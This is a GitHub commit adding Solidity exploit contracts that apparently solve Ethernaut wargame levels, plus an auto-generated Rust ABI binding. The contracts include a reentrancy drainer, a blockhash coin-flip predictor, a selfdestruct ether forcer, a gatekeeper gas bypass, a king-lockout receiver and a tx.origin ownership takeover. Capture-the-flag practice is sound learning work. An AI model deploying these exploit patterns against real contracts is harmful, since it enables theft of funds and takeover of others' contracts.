solve shit

data-cartel · Sep 1, 2023 · 47d6000 · 47d6000
1 parent c1b517c
commit 47d6000
Show file tree

Hide file tree

Showing 41 changed files with 4,485 additions and 224 deletions.
diff --git a/attack/contracts/ethernaut/CoinFlipExploit.sol b/attack/contracts/ethernaut/CoinFlipExploit.sol
@@ -0,0 +1,33 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.0;
+
+interface CoinFlip {
+    function flip(bool _guess) external returns (bool);
+}
+
+contract CoinFlipExploit {
+    uint256 public consecutiveWins;
+    uint256 lastHash;
+    uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;
+    CoinFlip target;
+
+    constructor(address _coinFlip) {
+        target = CoinFlip(_coinFlip);
+    }
+
+    function flip() public {
+        uint256 blockValue = uint256(blockhash(block.number - 1));
+
+        if (lastHash == blockValue) {
+            revert();
+        }
+
+        lastHash = blockValue;
+        uint256 coinFlip = blockValue / FACTOR;
+        bool side = coinFlip == 1 ? true : false;
+
+        bool result = target.flip(side);
+
+        require(result);
+    }
+}
diff --git a/attack/contracts/ethernaut/Donatexploit.sol b/attack/contracts/ethernaut/Donatexploit.sol
@@ -0,0 +1,42 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.6.12;
+
+interface Reentrance {
+    function balances(address) external view returns (uint256);
+    function donate(address _to) external payable;
+    function balanceOf(address _who) external view returns (uint256 balance);
+    function withdraw(uint256 _amount) external;
+}
+
+contract Donatexploit {
+    address payable public owner;
+    address public target;
+
+    bool private _reenter = true;
+    uint256 private _amount;
+
+    constructor(address _target) public {
+        owner = payable(msg.sender);
+        target = _target;
+    }
+
+    modifier onlyOwner() {
+        require(msg.sender == owner);
+        _;
+    }
+
+    function attack() public payable onlyOwner {
+        Reentrance reentr = Reentrance(payable(target));
+        reentr.donate{value: msg.value}(address(this));
+        _amount = reentr.balanceOf(address(this));
+        reentr.withdraw(_amount);
+    }
+
+    function withdraw() public onlyOwner {
+        owner.transfer(address(this).balance);
+    }
+
+    receive() external payable {
+        (bool _,) = target.call(abi.encodeWithSignature("withdraw(uint256)", _amount));
+    }
+}
diff --git a/attack/contracts/ethernaut/ElevatorExploit.sol b/attack/contracts/ethernaut/ElevatorExploit.sol
@@ -0,0 +1,27 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.0;
+
+interface Building {
+    function isLastFloor(uint256) external returns (bool);
+}
+
+interface Elevator {
+    function top() external returns (bool);
+    function floor() external returns (uint256);
+    function goTo(uint256 _floor) external;
+}
+
+contract ElevatorExploit is Building {
+    bool private _last = true;
+
+    function attack(address _target) public {
+        Elevator _elevator = Elevator(payable(_target));
+        _elevator.goTo(0);
+        require(_elevator.top(), "Didn't get to the top");
+    }
+
+    function isLastFloor(uint256) external returns (bool) {
+        _last = !_last;
+        return _last;
+    }
+}
diff --git a/attack/contracts/ethernaut/ForceExploit.sol b/attack/contracts/ethernaut/ForceExploit.sol
@@ -0,0 +1,16 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.0;
+
+contract ForceExploit {
+    address private owner;
+
+    constructor() payable {
+        require(msg.value > 0);
+        owner = msg.sender;
+    }
+
+    function hack(address _target) public {
+        require(msg.sender == owner && address(this).balance > 0);
+        selfdestruct(payable(_target));
+    }
+}
diff --git a/attack/contracts/ethernaut/Gatexploit.sol b/attack/contracts/ethernaut/Gatexploit.sol
@@ -0,0 +1,14 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.0;
+
+interface GatekeeperOne {
+    function entrant() external view returns (address);
+    function enter(bytes8 _gateKey) external returns (bool);
+}
+
+contract Gatexploit {
+    function attack(address _target) public {
+        GatekeeperOne gatekeeper = GatekeeperOne(payable(_target));
+        gatekeeper.enter{gas: (3 * 8191) + 268}(0x0000972000009720);
+    }
+}
diff --git a/attack/contracts/ethernaut/KingExploit.sol b/attack/contracts/ethernaut/KingExploit.sol
@@ -0,0 +1,33 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.0;
+
+interface King {
+    function prize() external view returns (uint256);
+    function owner() external view returns (address);
+    function _king() external view returns (address);
+}
+
+contract KingExploit {
+    address payable owner;
+    King king;
+
+    constructor(address _king) payable {
+        owner = payable(msg.sender);
+        king = King(payable(_king));
+    }
+
+    modifier onlyOwner() {
+        require(msg.sender == owner);
+        _;
+    }
+
+    function becomeKing() public onlyOwner {
+        uint256 prize = king.prize();
+        (bool success,) = address(king).call{value: prize}("");
+        require(success);
+    }
+
+    receive() external payable {
+        owner.transfer(address(this).balance + 1);
+    }
+}
diff --git a/attack/contracts/ethernaut/TelephoneExploit.sol b/attack/contracts/ethernaut/TelephoneExploit.sol
@@ -0,0 +1,16 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.0;
+
+interface Telephone {
+    function owner() external view returns (address);
+    function changeOwner(address _owner) external;
+}
+
+contract TelephoneExploit {
+    constructor(address _telephone) {
+        Telephone telephone = Telephone(_telephone);
+        address offender = address(0xa0Ee7A142d267C1f36714E4a8F75612F20a79720);
+        telephone.changeOwner(offender);
+        require(telephone.owner() == offender);
+    }
+}
diff --git a/attack/src/abi/building.rs b/attack/src/abi/building.rs
@@ -0,0 +1,137 @@
+pub use building::*;
+/// This module was auto-generated with ethers-rs Abigen.
+/// More information at: <https://github.com/gakonst/ethers-rs>
+#[allow(
+    clippy::enum_variant_names,
+    clippy::too_many_arguments,
+    clippy::upper_case_acronyms,
+    clippy::type_complexity,
+    dead_code,
+    non_camel_case_types,
+)]
+pub mod building {
+    #[allow(deprecated)]
+    fn __abi() -> ::ethers::core::abi::Abi {
+        ::ethers::core::abi::ethabi::Contract {
+            constructor: ::core::option::Option::None,
+            functions: ::core::convert::From::from([
+                (
+                    ::std::borrow::ToOwned::to_owned("isLastFloor"),
+                    ::std::vec![
+                        ::ethers::core::abi::ethabi::Function {
+                            name: ::std::borrow::ToOwned::to_owned("isLastFloor"),
+                            inputs: ::std::vec![
+                                ::ethers::core::abi::ethabi::Param {
+                                    name: ::std::string::String::new(),
+                                    kind: ::ethers::core::abi::ethabi::ParamType::Uint(
+                                        256usize,
+                                    ),
+                                    internal_type: ::core::option::Option::Some(
+                                        ::std::borrow::ToOwned::to_owned("uint256"),
+                                    ),
+                                },
+                            ],
+                            outputs: ::std::vec![
+                                ::ethers::core::abi::ethabi::Param {
+                                    name: ::std::string::String::new(),
+                                    kind: ::ethers::core::abi::ethabi::ParamType::Bool,
+                                    internal_type: ::core::option::Option::Some(
+                                        ::std::borrow::ToOwned::to_owned("bool"),
+                                    ),
+                                },
+                            ],
+                            constant: ::core::option::Option::None,
+                            state_mutability: ::ethers::core::abi::ethabi::StateMutability::NonPayable,
+                        },
+                    ],
+                ),
+            ]),
+            events: ::std::collections::BTreeMap::new(),
+            errors: ::std::collections::BTreeMap::new(),
+            receive: false,
+            fallback: false,
+        }
+    }
+    ///The parsed JSON ABI of the contract.
+    pub static BUILDING_ABI: ::ethers::contract::Lazy<::ethers::core::abi::Abi> = ::ethers::contract::Lazy::new(
+        __abi,
+    );
+    pub struct Building<M>(::ethers::contract::Contract<M>);
+    impl<M> ::core::clone::Clone for Building<M> {
+        fn clone(&self) -> Self {
+            Self(::core::clone::Clone::clone(&self.0))
+        }
+    }
+    impl<M> ::core::ops::Deref for Building<M> {
+        type Target = ::ethers::contract::Contract<M>;
+        fn deref(&self) -> &Self::Target {
+            &self.0
+        }
+    }
+    impl<M> ::core::ops::DerefMut for Building<M> {
+        fn deref_mut(&mut self) -> &mut Self::Target {
+            &mut self.0
+        }
+    }
+    impl<M> ::core::fmt::Debug for Building<M> {
+        fn fmt(&self, f: &mut ::core::fmt::Formatter<'_>) -> ::core::fmt::Result {
+            f.debug_tuple(::core::stringify!(Building)).field(&self.address()).finish()
+        }
+    }
+    impl<M: ::ethers::providers::Middleware> Building<M> {
+        /// Creates a new contract instance with the specified `ethers` client at
+        /// `address`. The contract derefs to a `ethers::Contract` object.
+        pub fn new<T: Into<::ethers::core::types::Address>>(
+            address: T,
+            client: ::std::sync::Arc<M>,
+        ) -> Self {
+            Self(
+                ::ethers::contract::Contract::new(
+                    address.into(),
+                    BUILDING_ABI.clone(),
+                    client,
+                ),
+            )
+        }
+        ///Calls the contract's `isLastFloor` (0x5f9a4bca) function
+        pub fn is_last_floor(
+            &self,
+            p0: ::ethers::core::types::U256,
+        ) -> ::ethers::contract::builders::ContractCall<M, bool> {
+            self.0
+                .method_hash([95, 154, 75, 202], p0)
+                .expect("method not found (this should never happen)")
+        }
+    }
+    impl<M: ::ethers::providers::Middleware> From<::ethers::contract::Contract<M>>
+    for Building<M> {
+        fn from(contract: ::ethers::contract::Contract<M>) -> Self {
+            Self::new(contract.address(), contract.client())
+        }
+    }
+    ///Container type for all input parameters for the `isLastFloor` function with signature `isLastFloor(uint256)` and selector `0x5f9a4bca`
+    #[derive(
+        Clone,
+        ::ethers::contract::EthCall,
+        ::ethers::contract::EthDisplay,
+        Default,
+        Debug,
+        PartialEq,
+        Eq,
+        Hash
+    )]
+    #[ethcall(name = "isLastFloor", abi = "isLastFloor(uint256)")]
+    pub struct IsLastFloorCall(pub ::ethers::core::types::U256);
+    ///Container type for all return fields from the `isLastFloor` function with signature `isLastFloor(uint256)` and selector `0x5f9a4bca`
+    #[derive(
+        Clone,
+        ::ethers::contract::EthAbiType,
+        ::ethers::contract::EthAbiCodec,
+        Default,
+        Debug,
+        PartialEq,
+        Eq,
+        Hash
+    )]
+    pub struct IsLastFloorReturn(pub bool);
+}